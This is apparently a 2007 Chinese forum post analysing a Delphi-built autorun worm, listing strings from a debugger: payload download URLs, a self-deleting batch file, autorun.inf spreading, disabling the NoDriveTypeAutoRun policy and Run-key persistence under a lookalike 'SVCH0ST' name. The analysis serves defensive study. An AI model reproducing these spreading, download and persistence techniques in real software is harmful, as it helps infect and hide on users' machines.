delphi编的exe
autorun一个
配套的svhost是同一个样本,md5不同- 0044E9AF MOV EDX,SERVICSu.0044EAE0 ASCII "SCVH0ST.EXE"
- 0044E9C7 PUSH SERVICSu.0044EAEC ASCII "http://www.99999999999.com.cn/SCVH0ST.EXE"
- 0044E9E1 PUSH SERVICSu.0044EB18 ASCII "http://www.99999999999.com.cn/SERVICS.EXE"
- 0044EA03 MOV EDX,SERVICSu.0044EB4C ASCII "delself.bat"
- 0044EA23 PUSH SERVICSu.0044EB60 ASCII "start "
- 0044EA2A PUSH SERVICSu.0044EB74 ASCII " /s -s "
- 0044EA5A MOV EDX,SERVICSu.0044EB84 ASCII "del %0"
- 0044EA8D MOV EAX,SERVICSu.0044EB4C ASCII "delself.bat"
- 0044EAE0 ASCII "SCVH0ST.EXE",0
- 0044EAEC ASCII "http://www.99999"
- 0044EAFC ASCII "999999.com.cn/SC"
- 0044EB0C ASCII "VH0ST.EXE",0
- 0044EB18 ASCII "http://www.99999"
- 0044EB28 ASCII "999999.com.cn/SE"
- 0044EB38 ASCII "RVICS.EXE",0
- 0044EB4C ASCII "delself.bat",0
- 0044EB60 ASCII "start ",0
- 0044EB74 ASCII " /s -s ",0
- 0044EB84 ASCII "del %0",0
- 0044EDAC MOV EDX,SERVICSu.0044EE58 ASCII "c:\windows\system32"
- 0044EDF9 MOV ECX,SERVICSu.0044EE74 ASCII "\system32"
- 0044EE58 ASCII "c:\windows\syste"
- 0044EE68 ASCII "m32",0
- 0044EE74 ASCII "\system32",0
- 0044EF38 MOV EDX,SERVICSu.0044F020 ASCII "UmFyIRoHAM+QcwAADQAAAAAAAAAjrHQgkj4AggMAAP0JAAACMWjcnu10cDMdAAAAAMxkAIAgAAEFudGljb2RlXGFudGljb2RlLkFTTQABwBMAsHawEAwZUMzM082B"
- 0044EF45 MOV EDX,SERVICSu.0044F0A8 ASCII "A03ABfghcnEfudadsfdgtertgsdsAdfgdfSDFdfgDGFdewrTfgfhjGTTrAIAgAAEFudGljb2RlXGFudGljb2RlLkFTTQABwBMAsHawEAwZUMzM082B"
- 0044EF52 MOV EDX,SERVICSu.0044F0A8 ASCII "A03ABfghcnEfudadsfdgtertgsdsAdfgdfSDFdfgDGFdewrTfgfhjGTTrAIAgAAEFudGljb2RlXGFudGljb2RlLkFTTQABwBMAsHawEAwZUMzM082B"
- 0044EF5F MOV EDX,SERVICSu.0044F124 ASCII "sjfskjfskjfsdsdueruiweuruiiuxzcyseyweryuxyuxyuyutweyrtyuyutwyerwewlkjlrwjrlkewjklewrjlkwejrlkw333333kk3kk33kk3k3k3"
- 0044EF6C MOV EDX,SERVICSu.0044F1A0 ASCII "4564545645454deddsfdsewrtewtdfdfgdgdfgert43tfdgdfgdg4t5frfdsddfdgdfdgdfddfgfdgfdgfgryteytryytuytyuiuoiopopoo333333"
- 0044EF79 MOV EDX,SERVICSu.0044F21C ASCII "6sd576sd576f576s56ssfdsfz6xc5xz6c65xzc65xz56zc56zxczxcxz65cxz65cz76x5z6x576xzc5zx76c5zx675xz675cxz65c76xz5z76x5x66"
- 0044EF86 MOV EDX,SERVICSu.0044F298 ASCII "n435mmnb45mn43b5n54b53n54m45nm45nm43nm54bn43b43nb4nb43nmb4nm43b5bnm4b4nm43m34nm34nm34n343nm4n3m4n34nm34nm34n3m3mmm"
- 0044EF93 MOV EDX,SERVICSu.0044F314 ASCII "3453535435dddss435345ju35j345k34kj53k5j3k4j5k34j534kj53k4j5k3535j35mm2xslkksaksasdkskdsdemnm34wBMAsHawEAwZUMzM082B"
- 0044EFA0 MOV EDX,SERVICSu.0044F390 ASCII "SDFSDF43wSDF$XZ#@$#@$WERWER@#$#@$SSA$#@%@#%SFSFSFSJHJIPOIPOIPOIPOIZCXZCXREWRW#$%%^*&(**&(*9834wBMAsHawEAwZUMzM082B"
- 0044EFAD MOV EDX,SERVICSu.0044F314 ASCII "3453535435dddss435345ju35j345k34kj53k5j3k4j5k34j534kj53k4j5k3535j35mm2xslkksaksasdkskdsdemnm34wBMAsHawEAwZUMzM082B"
- 0044F020 ASCII "UmFyIRoHAM+QcwAA"
- 0044F030 ASCII "DQAAAAAAAAAjrHQg"
- 0044F040 ASCII "kj4AggMAAP0JAAAC"
- 0044F050 ASCII "MWjcnu10cDMdAAAA"
- 0044F060 ASCII "AMxkAIAgAAEFudGl"
- 0044F070 ASCII "jb2RlXGFudGljb2R"
- 0044F080 ASCII "lLkFTTQABwBMAsHa"
- 0044F090 ASCII "wEAwZUMzM082B",0
- 0044F0A8 ASCII "A03ABfghcnEfudad"
- 0044F0B8 ASCII "sfdgtertgsdsAdfg"
- 0044F0C8 ASCII "dfSDFdfgDGFdewrT"
- 0044F0D8 ASCII "fgfhjGTTrAIAgAAE"
- 0044F0E8 ASCII "FudGljb2RlXGFudG"
- 0044F0F8 ASCII "ljb2RlLkFTTQABwB"
- 0044F108 ASCII "MAsHawEAwZUMzM08"
- 0044F118 ASCII "2B",0
- 0044F124 ASCII "sjfskjfskjfsdsdu"
- 0044F134 ASCII "eruiweuruiiuxzcy"
- 0044F144 ASCII "seyweryuxyuxyuyu"
- 0044F154 ASCII "tweyrtyuyutwyerw"
- 0044F164 ASCII "ewlkjlrwjrlkewjk"
- 0044F174 ASCII "lewrjlkwejrlkw33"
- 0044F184 ASCII "3333kk3kk33kk3k3"
- 0044F194 ASCII "k3",0
- 0044F1A0 ASCII "4564545645454ded"
- 0044F1B0 ASCII "dsfdsewrtewtdfdf"
- 0044F1C0 ASCII "gdgdfgert43tfdgd"
- 0044F1D0 ASCII "fgdg4t5frfdsddfd"
- 0044F1E0 ASCII "gdfdgdfddfgfdgfd"
- 0044F1F0 ASCII "gfgryteytryytuyt"
- 0044F200 ASCII "yuiuoiopopoo3333"
- 0044F210 ASCII "33",0
- 0044F21C ASCII "6sd576sd576f576s"
- 0044F22C ASCII "56ssfdsfz6xc5xz6"
- 0044F23C ASCII "c65xzc65xz56zc56"
- 0044F24C ASCII "zxczxcxz65cxz65c"
- 0044F25C ASCII "z76x5z6x576xzc5z"
- 0044F26C ASCII "x76c5zx675xz675c"
- 0044F27C ASCII "xz65c76xz5z76x5x"
- 0044F28C ASCII "66",0
- 0044F298 ASCII "n435mmnb45mn43b5"
- 0044F2A8 ASCII "n54b53n54m45nm45"
- 0044F2B8 ASCII "nm43nm54bn43b43n"
- 0044F2C8 ASCII "b4nb43nmb4nm43b5"
- 0044F2D8 ASCII "bnm4b4nm43m34nm3"
- 0044F2E8 ASCII "4nm34n343nm4n3m4"
- 0044F2F8 ASCII "n34nm34nm34n3m3m"
- 0044F308 ASCII "mm",0
- 0044F314 ASCII "3453535435dddss4"
- 0044F324 ASCII "35345ju35j345k34"
- 0044F334 ASCII "kj53k5j3k4j5k34j"
- 0044F344 ASCII "534kj53k4j5k3535"
- 0044F354 ASCII "j35mm2xslkksaksa"
- 0044F364 ASCII "sdkskdsdemnm34wB"
- 0044F374 ASCII "MAsHawEAwZUMzM08"
- 0044F384 ASCII "2B",0
- 0044F390 ASCII "SDFSDF43wSDF$XZ#"
- 0044F3A0 ASCII "@$#@$WERWER@#$#@"
- 0044F3B0 ASCII "$SSA$#@%@#%SFSFS"
- 0044F3C0 ASCII "FSJHJIPOIPOIPOIP"
- 0044F3D0 ASCII "OIZCXZCXREWRW#$%"
- 0044F3E0 ASCII "%^*&(**&(*9834wB"
- 0044F3F0 ASCII "MAsHawEAwZUMzM08"
- 0044F400 ASCII "2B",0
- 0044F471 PUSH SERVICSu.0044F6A8 ASCII ":"
- 0044F4A9 MOV EDX,SERVICSu.0044F6B4 ASCII ":\SERVICS.EXE"
- 0044F4D3 MOV EDX,SERVICSu.0044F6CC ASCII ":\SCVH0ST.EXE"
- 0044F575 MOV ECX,SERVICSu.0044F6E4 ASCII ":Autorun.inf"
- 0044F5BA MOV ECX,SERVICSu.0044F6FC ASCII "open"
- 0044F5BF MOV EDX,SERVICSu.0044F70C ASCII "AutoRun"
- 0044F5D1 MOV ECX,SERVICSu.0044F71C ASCII "Shellexecute"
- 0044F5D6 MOV EDX,SERVICSu.0044F70C ASCII "AutoRun"
- 0044F5E8 MOV ECX,SERVICSu.0044F734 ASCII "shell\Auto\command"
- 0044F5ED MOV EDX,SERVICSu.0044F70C ASCII "AutoRun"
- 0044F632 PUSH SERVICSu.0044F748 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
- 0044F650 PUSH SERVICSu.0044F784 ASCII "NoDriveTypeAutoRun"
- 0044F6A8 ASCII ":",0
- 0044F6B4 ASCII ":\SERVICS.EXE",0
- 0044F6CC ASCII ":\SCVH0ST.EXE",0
- 0044F6E4 ASCII ":Autorun.inf",0
- 0044F6FC ASCII "open",0
- 0044F70C ASCII "AutoRun",0
- 0044F71C ASCII "Shellexecute",0
- 0044F734 ASCII "shell\Auto\comma"
- 0044F744 ASCII "nd",0
- 0044F748 ASCII "Software\Microso"
- 0044F758 ASCII "ft\Windows\Curre"
- 0044F768 ASCII "ntVersion\Polici"
- 0044F778 ASCII "es\Explorer",0
- 0044F784 ASCII "NoDriveTypeAutoR"
- 0044F794 ASCII "un",0
- 0044F7ED PUSH SERVICSu.0044F98C ASCII "SCVH0ST"
- 0044F869 MOV EDX,SERVICSu.0044F99C ASCII "SCVH0ST.EXE"
- 0044F87A MOV EDX,SERVICSu.0044F9B0 ASCII "SERVICS.EXE"
- 0044F88B MOV EDX,SERVICSu.0044F99C ASCII "SCVH0ST.EXE"
- 0044F98C ASCII "SCVH0ST",0
- 0044F99C ASCII "SCVH0ST.EXE",0
- 0044F9B0 ASCII "SERVICS.EXE",0
- 0044F9C4 ASCII "",0
- 0044FA21 MOV EDX,SERVICSu.0044FB78 ASCII "CLSID\{A692062A-4782-461B-BE98-B520F01F96FC}\InprocServer32"
- 0044FA33 MOV EAX,SERVICSu.0044FBBC ASCII ".dll"
- 0044FA5C MOV EDX,SERVICSu.0044FBCC ASCII "\XQDBHO5.exe"
- 0044FA81 MOV EDX,SERVICSu.0044FBCC ASCII "\XQDBHO5.exe"
- 0044FAB1 MOV ECX,SERVICSu.0044FBE4 ASCII "SVCH0ST"
- 0044FAB6 MOV EDX,SERVICSu.0044FBF4 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
- 0044FAF9 MOV ECX,SERVICSu.0044FBE4 ASCII "SVCH0ST"
- 0044FAFE MOV EDX,SERVICSu.0044FBF4 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
- 0044FB20 MOV ECX,SERVICSu.0044FBE4 ASCII "SVCH0ST"
- 0044FB25 MOV EDX,SERVICSu.0044FBF4 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
- 0044FB78 ASCII "CLSID\{A692062A-"
- 0044FB88 ASCII "4782-461B-BE98-B"
- 0044FB98 ASCII "520F01F96FC}\Inp"
- 0044FBA8 ASCII "rocServer32",0
- 0044FBBC ASCII ".dll",0
- 0044FBCC ASCII "\XQDBHO5.exe",0
- 0044FBE4 ASCII "SVCH0ST",0
- 0044FBF4 ASCII "Software\Microso"
- 0044FC04 ASCII "ft\Windows\Curre"
- 0044FC14 ASCII "ntVersion\Run",0
复制代码
[ 本帖最后由 promised 于 2007-9-6 17:02 编辑 ] |